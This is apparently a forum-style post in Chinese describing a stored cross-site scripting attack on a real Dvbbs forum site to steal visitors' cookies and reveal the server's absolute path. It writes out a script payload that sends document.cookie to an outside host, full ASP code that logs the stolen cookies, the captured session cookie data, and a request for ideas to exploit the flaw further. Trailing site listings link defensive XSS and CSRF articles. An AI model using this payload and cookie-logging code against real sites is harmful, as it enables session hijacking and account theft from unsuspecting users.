关于动网的cookie泻露站点绝路径的问题
所属分类:
网络编程 / 黑客相关
阅读数:
1354
收藏 0赞 0分享
一、跨站测试
先看看我的一次跨站测试吧
我以职业欠钱的站点做测试吧:
Host:zhiyeqianqian.51web.cn
My Test:
先在他的论谈上传两张图,
图一的内容是:
<script>document.location='http://linzi.cnbct.org/cookie.asp?msg='+document.cookie</script>
得到url为UploadFile/2005-6/200562716565777847.jpg
图二则是偶的个人照
UploadFile/2005-6/200562716563048909.jpg
写个盗cookie的代码到我的空间,lcx的盗cookie代码有问题,所以修改了一下。
<%
cookiefile=Server.MapPath("cookie.txt")
set fs=server.CreateObject("scripting.filesystemobject")
set cookiefile=fs.OpenTextfile(cookiefile,8,True,0)
cookiefile.Write(Request.QueryString&"<br>")
cookiefile.close
set fs = nothing
%>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL= http://zhiyeqianqian.51web.cn/UploadFile/2005-6/200562716563048909.jpg">
接下来,点击图一,自动转到图二,
二、结果分析
再到我的空间看一下,抓到cookie如下:
msg=ewwwrootzhiyeqianqianwwwroot=UserID=218&usercookies=1&StatUserID=2190418138&password=想要吗?嘿嘿&userhidden=2&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=linzi;%20ASPSESSIONIDQSCAAQTB=HMPLNIMDHOCDJKPELPGBBOOG;%20Dvbbs;%20DvbbsMagicFace=862;%20upNum=2;%20ASPSESSIONIDQSAAARTB=JBPPMONDDEGFGHEOICDHFJIM<br>
分析cookie我们不难看出他的绝对路径是e:\wwwroot\zhiyeqianqian\wwwroot
三、论谈
本来,最初的测试我是在测试BCT论谈,成功暴出他的绝对路径,一开始的时候,我还认为可能又是动网出洞洞了,所以又去测试了其它几个站,测试结果是其它的站点并没有暴出路径,今天再次测试“欠我钱”的论谈,却又暴不出来,查了一下代码,和别人的代码一个样,根本没什么差别。
偶想听听大家的看法,到底是哪里出了问题,能不能深入利用~~~
JS和C#分别防注入代码
防范的时候需要对用户的输入进行检查。特别是一些特殊字符,比如单引号,双引号,分号,逗号,冒号,连接号等进行转换或者过滤。
收藏 0赞 0分享
QQ聊天记录删除了怎么恢复简单方法
你知道QQ聊天记录删除了怎么恢复吗?小编通过在网上收集大量的资料,总结出了一些简单的恢复误删除QQ聊天记录的方法,下面就让小编为你详细的介绍一下
收藏 0赞 0分享
跨站脚本攻击XSS(Cross Site Script)的原理与常见场景分析
XSS指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。这篇文章主要给大家介绍了关于跨站脚本攻击XSS(Cross Site Script)的原理与常见场景的相关资料,需要的朋友可以参
收藏 0赞 0分享
分析攻击IP来源地与防御IP攻击的应对策略
今天小编就为大家分享一篇关于分析攻击IP来源地并画出饼图的文章,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧
收藏 0赞 0分享
详解XSS 和 CSRF简述及预防措施
这篇文章主要介绍了XSS 和 CSRF简述及预防措施,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
收藏 0赞 0分享
详解WEB攻击之CSRF攻击与防护
这篇文章主要介绍了详解WEB攻击之CSRF攻击与防护,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
收藏 0赞 0分享
查看更多